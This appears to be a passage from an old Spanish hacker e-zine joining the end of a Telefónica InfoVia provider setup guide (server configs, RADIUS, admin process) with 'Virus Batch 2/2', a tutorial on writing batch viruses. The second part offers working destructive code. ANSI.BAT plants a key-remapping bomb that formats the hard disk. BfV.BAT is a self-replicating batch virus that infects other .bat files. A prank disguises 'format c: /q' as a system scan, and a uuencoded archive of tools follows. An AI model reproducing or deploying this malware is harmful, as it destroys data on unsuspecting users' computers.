6.1.2.3 Fichero /usr/ns-home/httpd-80.10.128.2.7/config/magnus.conf
-----------------------------------------------------------

#ServerRoot /usr/ns-home/https-443.192.168.2.7
Port 80
Address 10.128.2.7
LoadObjects obf.conf
RootObject default
ErrorLog /usr/ns-home/https-80.10.128.2.7/logs/errors
PidLog /usr/usr/ns-home/https-80.10.128.2.7/logs/pid
User httpd
ServerName alphaosf-infovia.telefonica.inf
Security off
MinProcs 16
MaxProcs 32
DNS on
Init fn=load-types mime-types= mime-types
Init fn=init-clf global=/usr/ns-home/https-80.10.128.2.7/logs/access
secure=/
usr/ns-home/https-80.10.128.2.7/logs/secure


6.1.2.4 Fichero /usr/ns-home/httpd-80.10.128.2.7/config/obj.conf
--------------------------------------------------------

<Object name=default>
NameTrans fn=pfx2dir from=/mc-icons dir=''/usr/ns-home/mc-icons''
NameTrans fn=document-root root=''/usr/ns-home/docs/internet''
PathCheck fn=unix-uri-clean
PathCheck fn=find-pathinfo
PathCheck fn=find-index index-names=''index.html,home.html''
ObjectType fn=type-by-extension
ObjectType fn=force-type type=text/plain
Service method=(GET|HEAD) type=magnus-internal/imagemap
fn=imagemap
Service method=(GET|HEAD) type=magnus-internal/directory fn=index-
common
Service method=(GET|HEAD) type=*”magnus-internal/* fn=send-file
AddLog fn=common-log
AddLog fn=record-keysize name=secure
</Object>
<Object name=cgi>
ObjectType fn=force-type type=magnus-internal/cgi
Service fn=send-cgi
</Object>


6.1.3 Configuracion del servidor RADIUS
---------------------------------

El CPI elegido para el ejemplo permite el acceso a Internet a traves
de InfoVia.
Por lo tanto, debera instalarse en la maquina UNIX del CPI un servidor
RADIUS
que gestione el ``pool'' de direcciones de Internet y las vaya
asignando a los
usuarios llamantes. En el ejemplo propuesto, este ``pool'' de
direcciones IP
asignadas por el IANA al proveedor esta dividido a su vez en dos
rangos, uno
para el CSIV de Madrid, y otro para el CSIV de Barcelona. El rango
asignado
al primer CSIV es el que va de la direccion 192.168.2.129 a la
192.168.2.158.
El rango asignado al segundo CSIV es el que va de la direccion
192.168.2.161
a la 192.168.2.190.
En el ejemplo, el servidor RADIUS se ha instalado en el directorio:

/usr/users/prueba/radius_osf

Para obtener el fichero ejecutable del servidor, los ficheros fuente
del
servidor RADIUS deberan compilarse para una maquina UNIX de Digital.
El
fichero ejecutable se ha situado en el directorio
/usr/users/prueba/radius_osf.
Para el arranque del servidor, desde el directorio anterior ha de
ejecutarse
el comando:

nohup ./radiusd -d &

Si se quieren trazas del servidor, en el directorio
/usr/users/prueba/radius_osf deberan ejecutarse los siguientes
comandos:

touch Activar.radius1
touch Activar.radius2

El servidor estara activo si al ejecutar el comando:

ps ax | grep radiusd

Se obtiene una respuesta del tipo:

prueba 24024 23998 4 16:28:00 pts/1 0:00 grep radiusd
prueba 22623 171Oct 16 pts/0 0:01 radiusd -d .

La opcion con la que se arranca el servidor RADIUS es:

-d <nombre_del_directorio_radius>

Los ficheros de configuracion del servidor, almacenados en el
directorio
/usr/users/prueba/radius_osf, son los mismos que se indicaron en el
apartado
4.1.3 del Capitulo 4.


6.1.4 Configuracion del servidor DNS
------------------------------

Para la configuracion del servidor DNS se recomienda consultar el
apartado
4.1.4 y el apartado 6.1.5 de este documento.


6.2 CONFIGURACION DEL ``ROUTER''
----------------------------

Al emplearse en este ejemplo el mismo ``router'' que en ejemplo del
Capitulo 4,
el fichero de configuracion es el mismo que el incluido en el apartado
apartado 4.2 de este documento.


7 INFORMACION ADICIONAL PARA LA INSTALACION DE UN CPI
===================================================

Telefonica ofrece a los proveedores de informacion, el codigo,
compilado para
diversas plataformas, del servidor RADIUS. Con el proposito de
facilitar la
distribucion de software, el codigo compilado para los diferentes
tipos de
plataforma esta disponible en un servidor ftp anonimo.

8 PROCESO ADMINISTRATIVO
======================

Una empresa que desee ofrecer sus servicios a traves de InfoVia debera
completar un formulario en el que los principales apartados seran los
siguientes:

. Objetivo del servicio.
Se expondra el tipo de servicio que se va a ofertar, que debera de ser
publico
y no restringido, asi como su nombre comercial. Esta informacion
permitira
definir a InfoVia cual debe de ser la ubicacion en el arbol de
navegacion de
este servicio.

. Contenido de la hoja HTML
El proveedor debera entregar un fichero con formato HTML, o bien
delegar la
funcion de creacion de dicho fichero a InfoVia.
La importancia de este fichero queda clara teniendo en cuenta que sera
la
unica informacion especifica que InfoVia suministrara a los
hipoteticos
usuarios del proveedor del servicio sobre las caracteristicas del
mismo.
Se sugiere que en este apartado debe quedar claro para los usuarios:

- El tipo de servicio comercializado.
- Procedimiento administrativo para darse de alta en el servicio si
fuera
necesario.
- Costes asociados a la utilizacion del servicio, asi como el
procedimiento
de cobro (tarjeta de credito, factura mensual, etc ...).
- Caracteristicas que debe poseer el equipamiento del usuario:
Memoria, CPU,
velocidad de transferencia, etc ...
- Si el usuario debe de instalar software especifico para acceder a
este
servicio, se debe de indicar el mecanismo de acceso a dicho software.
- Ambito geografico del servicio. Si el servicio se va a ofrecer a
usuarios
de una comunidad autonoma o a varias y cuales.

. Numero de maquinas desde las que se va a ofertar el servicio.
- El proveedor informara en este apartado cuantas maquinas van a ser
accesibles
desde InfoVia para la provision del servicio.

. Tipo de servicio.
- Autentificado o no autentificado
- Administracion de la direcciones IP por parte del proveedor o
administradas
por InfoVia.
Si el proveedor desea administrar un rango de direcciones propias
(direcciones
de Internet, como es el caso de los CPIs con acceso a Internet desde
InfoVia),
debera acreditar que dichas direcciones le han sido adjudicada por la
IANA.

. Numero maximo de usuarios simultaneamente conectados al proveedor.
En este apartado, el proveedor informara del numero maximo de
conexiones
simultaneas que quiere atender por cada una de las comunidades
autonomas.

. Caracteristicas del acceso fisico a InfoVia.
El usuario debera de indicar el tipo de acceso deseado:
- Frame relay: Parametros asociados a la interfaz frame relay.
El proceso administrativo de dar de alta estas interfaces, lo podra
realizar
el proveedor o delegarlo en InfoVia.
Al proveedor del servicio, como respuesta a su peticion, se le
suministraran
los siguientes datos:

. Rango de direcciones IP reservadas al proveedor.
Sera siempre una subred de longitud 256 direcciones.
. Direcciones IP concretas asignadas a las maquinas del
proveedor.
Seran direcciones pertenecientes al rango anterior a traves
de las
cuales se oferta el servicio.
. Direccion IP del servidor de RADIUS.
. Direccion del centro de gestion InfoVia.

Se le suministrara la direccion RTB y X.25, asi como la clave
(``password'')
que permitiran al proveedor del servicio acceder a los datos de
trafico de su
servicio.
Toda esta informacion se recogera en un documento con formatos y
campos a
rellenar, en los que el proveedor se sometera a las leyes civiles que
rigen
estas asociaciones y que quedaran ampliamente aclaradas y enumeradas.
Este
proceso formal podra ser discutido en forma y contenido, pero es
Telefonica,
o en su caso la filial que comercialice el servicio InfoVia, la que
sera
competente en estas labores y la que detallara mas profundamente todos
estos
aspectos, asi como las acciones a seguir para incorporarse a InfoVia.

GLOSARIO DE TERMINOS Y ACRONIMOS

AUI: ``Attachment Unit Interface''.
CGIV: Centro de Gestion InfoVia.
CPI: Centro Proveedor de Informacion.
CSIV: Centro de Servicio InfoVia.
FTP: ``File Transfer Protocol''.
GSM: ``Global System Mobile communication''.
HDLC: ``High-level Data Link Control''.
HTML: ``HyperText Markup Language''.
IANA: ``Internet Assigned Numbers Authority''.
IP: ``Internet Protocol''.
LAN: ``Local Area Network'' (red de area local).
NCSA: ``National Center for Supercomputing Applications''.
PVC: ``Permanent Virtual Circuit'' (Circuito Virtual Permanente).
RAL: Red de Area Local.
RDSI: Red Digital de Servicios Integrados.
RFC: ``Requests For Coments''.
RTB: Red Telefonica Basica.
SIU: ``Signaling Interface Unit''.
TCP/IP: ``Transfer Control Protocol/Internet Protocol''.
UDP: ``User Datagram Protocol''.
UTR: Unidad de Terminacion de Red.


Eso es todo amigos:

"Imagination is more important than knowledge"
A. Einstein


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ VIRUS BATCH (2a Parte) - Yo_Soy ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


<® VIRUS BATCH 2/2 ¯>



Hace tiempo que escribi la primera parte, algo confusa, espero no hacerlo
de nuevo, esta segunda guia mostrara parte la creacion de cualquier batch.
Bueno, antes de cualquier otra cosa, esta vez explicare los elementos a
los cuales vamos a tratar, ya que recibi mail de personas que no
entendian el proceso, si ya conoces todo esto, puedes saltarlo.


-Í[ ARCHIVOS BATCH ]Í-


 Variables
 Redireccion
 Comentarios
 Etiquetas
 Desiciones

ÍÍ> VARIABLES

Los archivos batch (bat) utilizan el signo de porcentaje para se¤alar las
variables ( %var1% , %var2% , etc.) y se utiliza el comando "set" para
asignar variables y borrarlas.

Ejemplo:


@echo off <= No muestra los comandos en pantalla.
set var1=RareGaZz <= Asigna a la primer variable RareGaZz
set var2=E-Zine <= Asigna a la segunda variable E-Zine
echo %var1% %var2% <= Muestra en pantalla los valores de las 2 variables.
set var1= <= Elimina la primer variable
set var2= <= Elimina la segunda variable

Espero que este ejemplo haya sido claro.


ÍÍ> REDIRECCION

Redireccionamos la salida del programa a otros lugares, como por ejemplo,
a un archivo, a¤adir a un archivo, y a otro programa, asi:

> Envia la salida a un archivo.
>> A¤ade la salida a un archivo.
| Envia la salida a un programa.

Ejemplo:


@echo off
cls
echo mando este mensaje al archivo prueba.txt >prueba.txt
echo ahora a¤ado este otro mensaje a prueba.txt >>prueba.txt
echo.
echo.
echo. Pulse enter para continuar.
pause>nul
type autoexec.bat | more


Ok, cuando use "pause>nul" lo que hice fue redireccionar la salida a nada.
Asi no sale nada en pantalla, despues "type autoexec.bat | more" lo que
hice fue ver el contenido del autoexec.bat y mandar la salida a el comando
more, asi me lo despliega pantalla por pantalla.


ÍÍ> COMENTARIOS Y ETIQUETAS

Los comentarios pueden ir utilizando el comando REM y opcionalmente lo
mas recomendado a la hora de poner comentarios seran con dos veces dos
puntos. A diferencia de la programacion en otros lenguajes los comentarios
no van en la misma linea que el codigo. Las etiquetas se utilizaran solo
colocando dos puntos antes de la etiqueta ( una vez ) y el comando "goto"
lo que hace es transferir el control del programa a otra parte del archivo.


Ejemplo:

:: prueba de goto y comentario
:: este es un comentario
@echo off
goto fin
 Este texto puede ser lo que sea 
 porque nunca saldra en la pantalla 
:fin
echo Listo.


ÍÍ> DECISIONES

Las decisiones en Batch seran utilizando el comando "If" que lo que hace
es evaluar una condicion y si es correcta, ejecuta un comando. Puede ser
utilizada para comparar una cadena de caracteres con otra, ver si existe
un archivo determinado o el errorlevel de otro programa, asi:

if [not] cadena1==cadena2 comando
Compara la cadena1 con la cadena2, y si es verdadero ejecuta el comando.

if [not] exist rare015.txt comando
Si existe el archivo rare015.txt entonces ejecuta el comando.

Ejemplo:

@echo off
:: Prueba de la forma "If"
cls
IF EXIST C:\WINDOWS\NULL echo Windows existe.
IF NOT EXIST C:\YO-SOY echo no existe el directorio Yo-Soy
echo. Fin.


if [not] ERRORLEVEL numero comando
Evalua el ultimo ErrorLevel presentado por un programa, este es dado
para informar como termino el programa (si finalizo como deberia o hubo
errores, etc.) No todos los programas presentan esto y se pierde el
errorlevel cuando otro programa se ejecuta.

Not puede ser opcional.

El errorlevel nos sera util a la hora de usar el comando CHOICE, para
crear menus y otras cosas. El comando Choice lo que hace es preguntar
una tecla de una serie y asignarle un errorlevel en consecuencia a la
tecla presionada. Ejemplo:

@echo off
:menu
cls
echo MENU SIMPLE
echo ÍÍÍÍÍÍÍÍÍÍÍ
echo.
echo 1 - Ejecutar Editor
echo 2 - Ejecutar Windows XD
echo S - Salir
choice /c:12S>nul
if errorlevel 3 goto fin
if errorlevel 2 goto windows
if errorlevel 1 goto editor
echo Falta el comando CHOICE
goto fin

:editor
edit
goto menu

:windows
cd \windows
win
goto menu

:fin

Los Errorlevels dependen mucho de la posicion que le asignes, ejemplo:

CHOICE /C:ABCD

³³³³
³³³ÀÄ> Da Errorlevel 4
³³ÀÄÄ> Da Errorlevel 3
³ÀÄÄÄ> Da Errorlevel 2
ÀÄÄÄÄ> Da Errorlevel 1

CHOICE /C:2567
Presionando 2 nos regresa un Errorlevel de 1, 5 errorlevel de 2, 6 de 3,
y 7 de 4.

Bueno, creo que con esto explico lo basico, si necesitas algo mas, puedes
ver en el HELP del Dos.


-Í[ VIRUS ]Í-

Los Virus Batch como su nombre lo indica estan creados en Batch, estos
pueden contener rutinas en ANSI (Bombas Ansi), estas funcionan en Win95
(en cualquier sistema basado en Ms-Dos). Veamos uno.

El disco duro muere despues de que reinicie el sistema, y no hara nada
hasta que el presione Enter por lo menos una vez en DOS (no muy dificil
de cumplir).


ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ ANSI.BAT ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

@echo off
:: Para que funcione debe de cargarse el controlador ANSI, para ello
:: vamos a introducirlo en el config.sys para que se cargue la proxima
:: vez que se inicie.
copy c:\config.sys c:\temp.sys
deltree /y c:\config.sys
ren c:\temp.sys config.sys
:: En caso de ke el config.sys este protegido contra escritura
if exist C:\dos\ansi.sys goto DOS
goto Winblows
:DOS
echo DEVICE=C:\DOS\ANSI.SYS >> c:\config.sys
goto auto
:: Si la persona esta corriendo DOS entonces a¤ade esa linea para cargar
:: el controlador ANSI la proxima vez que inicie.
if exist C:\windows\command goto Winblows
:WINBLOWS
echo DEVICE=C:\WINDOWS\COMMAND\ANSI.SYS >> c:\config.sys
:: Esta linea se a¤ade al config.sys si esta utilizando Windows.

:: Ahora la parte importante
:: Vamos a meter unas cuantas lineas al autoexec.bat
:: para que la proxima vez que inicie BOOM =)

:AUTO
echo prompt $e[0;30m >> c:\autoexec.bat
:: La pantalla se volvera negra.
echo prompt $e[13;0;80;99;58;13;99;100;92;13;102;111;114;109;97;116;32;99;58;32;47;113;32;"/t:20 /n:50";13;121;13; >> c:\autoexec.bat
:: Formatea rapidamenta su disco duro, aprox. 20-30 segundos
:: Hace un Formateo a bajo nivel, jode el disco duro =)
echo prompt  >> c:\autoexec.bat
echo prompt $p$g >> c:\autoexec.bat
:: Regresa la pantalla a la normalidad.
if exist c:\windows\command goto COMMAND
goto END
:COMMAND
echo c:\command.com >> c:\autoexec.bat
:: En caso de que tenga Win95, comenzara en DOS...
:: y asi la bomba se ejecuta y vale madres...
:END

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ FIN ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


He aqui unos ejemplos de unos virus.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ BfV.BAT ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

[ BfV ]
@echo off%[BfV_B]%
if '%1=='## goto BfV_%2
if exist C:\_BfV.bat goto BfV_
if not exist %0.bat goto BfV_end
find "BfV"<%0.bat>C:\_BfV.bat
attrib C:\_BfV.bat +h
:BfV_
command /e:5000 /c C:\_BfV ## run
goto BfV_end
:BfV_run
for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i
exit BfV
:BfV_inf
if '%BfV%=='1111111 exit
set BfV=%BfV%1
find "BfV"<%3>nul
if not errorlevel 1 goto BfV_end
type %3>BfV
type C:\_BfV.bat>>BfV
move BfV %3>nul
exit BfV
:BfV_end

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


Tambien puedes hacer maldades poco eticas, como por ejemplo:

@echo off
CLS
ECHO. @echo off >>c:\autoexec.bat
ECHO. echo Su sistema no termino como deberia, ahora se realizara >>c:\autoexec.bat
ECHO. echo una exploracion rutinaria en su sistema. >>c:\autoexec.bat
ECHO.
ECHO. echo Buscando fallos en su sistema... >>c:\autoexec.bat
ECHO. echo por favor espere.. >>c:\autoexec.bat
ECHO. format c: /q >>c:\autoexec.bat
echo. Echo Ningun problema fue detectado >>c:\autoexec.bat


Ademas, podemos hacer nuestro archivo.bat en .exe o .com con las siguientes
utilidades o bajandolas directamente de la pagina de RareGaZz ;).
Las posibilidades son muchas, podemos combinarlos con las Nowhere Utilities,
jugarle una broma a un amigo, etc.


ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ CORTAR AQUI ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

begin 666 BATCH.ZIP
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
